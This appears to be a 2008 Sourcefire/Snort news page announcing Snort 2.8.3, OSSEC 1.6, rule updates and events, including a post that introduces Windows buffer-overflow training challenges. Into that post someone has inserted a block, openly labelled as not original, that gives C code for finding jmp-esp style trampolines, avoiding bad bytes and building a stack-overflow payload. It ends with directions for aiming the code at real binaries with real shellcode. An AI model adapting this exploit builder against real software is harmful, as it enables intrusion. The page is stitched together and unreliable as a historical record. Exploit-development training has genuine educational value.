News
Snort 2.8.3 Now Available
Snort Release Team (Sourcefire) @ September 05, 2008 15:04:34

Snort 2.8.3 is now available on snort.org, at http://www.snort.org/dl/

Snort 2.8.3 introduces:
- MPLS decoding support
- Improvements to HTTP Inspect to provide more information to the rules language
- Several other improvements and fixes

Please see the release notes and changelog for more details. Happy Snorting! The Snort Release Team
OSSEC HIDS 1.6 Released
Mike Guiterman (Sourcefire) @ September 02, 2008 15:46:51

From Daniel Cid of the OSSEC Team:

"The OSSEC team is pleased to announce the general availability of OSSEC version 1.6. OSSEC is an Open Source Host-based Intrusion Detection System. It performs log analysis, integrity checking, Windows registry monitoring, rootkit detection, real-time alerting and active response. It runs on most operating systems, including Linux, OpenBSD, FreeBSD, MacOS, Solaris and Windows.

This new version delivers the most comprehensive update to OSSEC in its history, with numerous new features and bug fixes, including:
* New multi-server architecture
* New platform support for Microsoft Vista (and Server 2008)
* New platform support for VMware ESX
* Added active response module for Windows
* CIS benchmarks on Linux (through the policy auditing)
* Added the VMware Security hardening guideline to the policy auditing
* Added support for McAfee VirusScan Enterprise logs
* Added support for VMware ESX hostd logs
* Added support for Mac OS FTP server logs
* New tools to better manage the data stored (syscheck_control, rootcheck_control, log_test)

And much more… Check the release message for more information: http://www.ossec.net/main/ossec-v16-released

Download it from: http://www.ossec.net/main/downloads"

Congratulations on the release, guys!
VRT Certified Rules Update Available
Sourcefire VRT (Sourcefire) @ August 26, 2008 16:11:32

The Sourcefire VRT has added multiple rules in the web-client and exploit categories to provide coverage for emerging ActiveX control and exploit threats. These rules are available to subscribers only until Thursday, September 25, 2008.
Snort Users Group Melbourne - Sept. 10, 2008
Mike Guiterman (Sourcefire) @ August 26, 2008 15:50:32

Hi Everyone, here are the details for a Snort Users Group meeting in Melbourne, Australia.

Date: Wednesday the 10th of September
Location: Misty Place, 3 - 5 Hosier Lane, Melbourne
Time: 5:00 PM (for 5:30 PM presentation) - 6:30 PM

The Snort Users Group Meeting gives you a chance to meet and greet fellow Snort users, give your input for future user group presentations, and find out more about Snort 3.0.
Bar snacks and refreshments will be provided by Sourcefire®, the creators of Snort.
Please RSVP by email to kelvin.rundle@sourcefire.com by 5:00 PM on the 8th of September.
Defcon, testing and exploiting
Lurene Grenier VRT (Sourcefire) @ August 22, 2008 17:03:13
This year at Defcon Immunity trotted out the first iteration of their NOP cert test, and I had the pleasure of giving it a test run. I still think it's a great indicator of ability, despite the Immunity tools focus; I'm not a user of any of their tools generally, but I managed to pull off the hardest level test in a modest time. It got us thinking on the way home, where does one go from the bar set by the NOP to get to the next level in terms of exploit development skill? In this vein I've thrown together a few windows executables, and in a nod to Gera of Core, they're called Advanced Windows Buffer Overflows (AWBOs).
We've set up a few ground rules and a basic setup to keep things moving along:
1) All exploits are performed in Windows 2000 SP4 unless otherwise specified. Sometimes, otherwise will be specified.
2) Exploits will use the provided shellcode, or ret2lib.
3) You may not return to hard-coded stack addresses.
4) No source code will be provided - just like the NOP cert.
Standard tools used are Cygwin with Perl, and WinDbg; installation in VMware is a plus. The shellcode provided is the amazing Windows exec shellcode from Metasploit, set up to run calc.exe.
I can say that all of these are exploitable, and they run through a progression, so try to do each of them in the most straightforward way possible. We'll be skipping awbo1.exe as it's very similar to one of Immunity's tests (as far as my memory serves). They'll be released slowly over the next few months. Feel free to send in your solutions, or ask for tips. All of the examples have been play-tested by the VRT analyst team, and are assured to be exploitable.
"This next test could take a very, very long time. If you become lightheaded from thirst, feel free to pass out. An intubation associate will be dispatched to revive you with peptic salve and adrenaline."
Awbo2.exe download and shellcode download
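A worked illustration of ground rules 2 and 3, added here as an example and not part of the original post or of the AWBO challenge files: rather than returning to a hard-coded stack address, scan a module image for a `jmp esp` / `call esp` / `push esp; ret` trampoline, discard candidates whose address contains bytes the target's input path would swallow, and build the overflow buffer so the saved return address points into that module and the shellcode sits where ESP lands after `ret`. Everything here is constructed for the example: the module bytes, the base address 0x7C801000, the bad-byte list, the 64-byte offset to the saved return address and the four-byte placeholder shellcode. Against a real AWBO binary you would take the trampoline from a DLL actually mapped in the process (WinDbg's `s` search over a module range does this), the offset from your own crash analysis, and the shellcode from the Metasploit calc.exe payload the post ships.

```c
/*
 * Added example (not from the AWBO post or challenge files): return through a
 * module trampoline instead of a hard-coded stack address.
 * Module image, base, bad bytes, offset and shellcode are all constructed.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* x86 two-byte sequences that transfer control to the address held in ESP. */
static const struct { const char *name; uint8_t op[2]; } kTrampolines[] = {
    { "jmp esp",       { 0xFF, 0xE4 } },
    { "call esp",      { 0xFF, 0xD4 } },
    { "push esp; ret", { 0x54, 0xC3 } },
};

/* Constructed stand-in for the .text bytes of a DLL mapped at kBase.
 * Offset 0x0A holds "jmp esp" (its VA ends in 0x0A, a bad byte below);
 * offset 0x13 holds "push esp; ret" with a clean VA. */
static const uint32_t kBase = 0x7C801000u;
static const uint8_t kImage[] = {
    0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10, 0x8B, 0x45, 0x08, 0x90, /* 0x00-0x09 */
    0xFF, 0xE4,                                                 /* 0x0A jmp esp */
    0x90, 0x90, 0x90, 0x90, 0x5D,                               /* 0x0C-0x10 */
    0xC3, 0xCC,                                                 /* 0x11-0x12 */
    0x54, 0xC3,                                                 /* 0x13 push esp; ret */
    0xCC, 0xCC                                                  /* 0x15-0x16 */
};

/* Bytes that typically break a string-based delivery path (NUL, LF, CR). */
static const uint8_t kBadChars[] = { 0x00, 0x0A, 0x0D };

/* Placeholder shellcode (int3 x4); not the Metasploit windows/exec payload. */
static const uint8_t kShellcode[] = { 0xCC, 0xCC, 0xCC, 0xCC };

/* True if no byte of the little-endian encoding of va is in bad[]. */
static int addr_is_clean(uint32_t va, const uint8_t *bad, size_t nbad)
{
    for (int shift = 0; shift < 32; shift += 8) {
        uint8_t b = (uint8_t)(va >> shift);
        for (size_t i = 0; i < nbad; i++)
            if (b == bad[i]) return 0;
    }
    return 1;
}

/* Virtual address of the first trampoline in img whose address is free of
 * bad bytes, or 0 if none is found. */
uint32_t find_trampoline(const uint8_t *img, size_t len, uint32_t base,
                         const uint8_t *bad, size_t nbad)
{
    size_t ntramp = sizeof kTrampolines / sizeof kTrampolines[0];
    for (size_t i = 0; i + 1 < len; i++) {
        for (size_t t = 0; t < ntramp; t++) {
            if (img[i] != kTrampolines[t].op[0] || img[i + 1] != kTrampolines[t].op[1])
                continue;
            uint32_t va = base + (uint32_t)i;
            if (addr_is_clean(va, bad, nbad))
                return va;
        }
    }
    return 0;
}

/* Layout: ret_off bytes of filler, the trampoline VA (little-endian), then the
 * shellcode, which is exactly where ESP points once the overwritten return
 * address has been popped. Returns total length, or 0 if cap is too small. */
size_t build_payload(uint8_t *out, size_t cap, size_t ret_off, uint32_t va,
                     const uint8_t *sc, size_t sclen)
{
    size_t total = ret_off + 4 + sclen;
    if (total > cap) return 0;
    memset(out, 'A', ret_off);
    out[ret_off + 0] = (uint8_t)(va);
    out[ret_off + 1] = (uint8_t)(va >> 8);
    out[ret_off + 2] = (uint8_t)(va >> 16);
    out[ret_off + 3] = (uint8_t)(va >> 24);
    memcpy(out + ret_off + 4, sc, sclen);
    return total;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "payload.bin";
    uint32_t va = find_trampoline(kImage, sizeof kImage, kBase, kBadChars, sizeof kBadChars);
    if (!va) { fputs("no clean trampoline\n", stderr); return 1; }

    uint8_t buf[256];
    size_t n = build_payload(buf, sizeof buf, 64, va, kShellcode, sizeof kShellcode);
    FILE *f = fopen(path, "wb");
    if (!f || fwrite(buf, 1, n, f) != n) { perror(path); return 1; }
    fclose(f);
    printf("trampoline at 0x%08X, wrote %zu bytes to %s\n", va, n, path);
    return 0;
}
```

The bad-byte filter is why the scanner walks past the first `jmp esp`: its address 0x7C80100A contains 0x0A, which a line-oriented reader would cut, so the payload instead returns through `push esp; ret` at 0x7C801013. Swap the constructed image for bytes dumped from a real module and the offset for the one your crash shows, and the same builder produces the file you feed to the target from the Cygwin side.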
VRT Certified Rules Update Available
Sourcefire VRT (Sourcefire) @ August 19, 2008 17:10:56

The Sourcefire VRT has added multiple rules in the spyware-put, web-client and sql categories to provide coverage for emerging spyware, ActiveX control and SQL injection threats. These rules are available to subscribers only until Thursday, September 18, 2008.
VRT Certified Rules Update Available
Sourcefire VRT (Sourcefire) @ August 12, 2008 18:22:33

The Sourcefire VRT is aware of multiple vulnerabilities affecting Microsoft products. These rules are available to subscribers only until Thursday, September 11, 2008.
OfficeCat Update Available
Sourcefire VRT (Sourcefire) @ August 12, 2008 17:13:59

The OfficeCat tool has been updated to include detection for a vulnerability in Microsoft PowerPoint. Windows and Linux-wine archives are available for download.
DNS Vulnerability Paper
VRT (Sourcefire) @ August 11, 2008 15:38:33

Now that Defcon is over and the Kaminsky DNS vulnerability is completely out in the open, the Sourcefire VRT has a new whitepaper that discusses the issue and suggests detection methods using Snort rules. Download it here.
Daemonlogger v1.1 Released
Mike Guiterman (Sourcefire) @ August 07, 2008 11:16:24

Marty released Daemonlogger 1.1 yesterday. In this release:

Daemonlogger v1.1 can be downloaded at: http://www.snort.org/users/roesch/Site/Daemonlogger/Daemonlogger.html

Enjoy!